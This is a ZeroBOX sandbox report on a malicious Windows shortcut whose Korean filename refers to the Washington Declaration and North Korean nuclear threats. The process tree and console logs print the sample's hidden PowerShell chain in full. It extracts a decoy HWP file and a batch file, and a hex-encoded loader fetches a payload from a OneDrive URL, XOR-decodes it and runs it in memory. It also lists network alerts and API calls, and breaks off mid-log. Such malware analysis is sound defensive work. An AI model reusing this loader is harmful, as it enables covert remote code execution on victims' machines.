popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P Hide_URL DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential GIF Format AntiDebug HWP AntiVM MSOffice File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 10, 2023, 9:13 a.m. May 10, 2023, 9:15 a.m.
Size 50.8MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 445e7fd6bb684420d6b8523fe0c55228
SHA256 2d381a0156d8b0468d10dfd347b32cf10f97026e248ccd95edbcd28030ade4d4
CRC32 02E0635B
ssdeep 1536:50bUiut8Ihn1XwS8wqYQrdb9YNSxpL/Y819G:5YPdIhN4dqNqpL/Yk9G
Yara
  • HWP_file_format - HWP Document File
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ySYsgYc" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk"

    3012

    • cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;

      2200

      • powershell.exe powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;

        2220

        • Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp"

          2428

        • cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\230509.bat""

          284

          • cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"

            452

            • powershell.exe powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"

              2548

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49220 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49221 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49219 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49212 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49227 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49222 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49223 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49224 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49216 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49230 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49219
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49221
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49212
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49220
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49222
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49227
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49223
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49224
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49216
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1
192.168.56.102:49230
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern In
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: tPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA"
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool Virtu
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: alProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinitio
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: n $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRmTWdo
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ZExudm9zdUExcHc_ZT1scUoweWU/root/content";$bb='[DllImport("kernel32.dll")]publi
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: c static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,In
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: tPtr f);';$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllI
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: mport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: uint b);';$fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;do
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: { try { $c.Headers["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d)
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: ;$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;$aab::VirtualProte
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: ct($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);for ($h = 1;$h -lt $xmpw4.Length;
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: $h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: h] -bxor $xmpw4[0]) );};try{throw 1;}catch{$handle=$ccc::CreateThread(0,0,$x0,0
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: ,0,0);$fff::WaitForSingleObject($handle, 500*1000);};$e=222;}catch{sleep 11;$e=
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: 112;}}while($e -eq 112);
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000137
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dbd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dbd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dbd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002642a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00264920
flags: 0
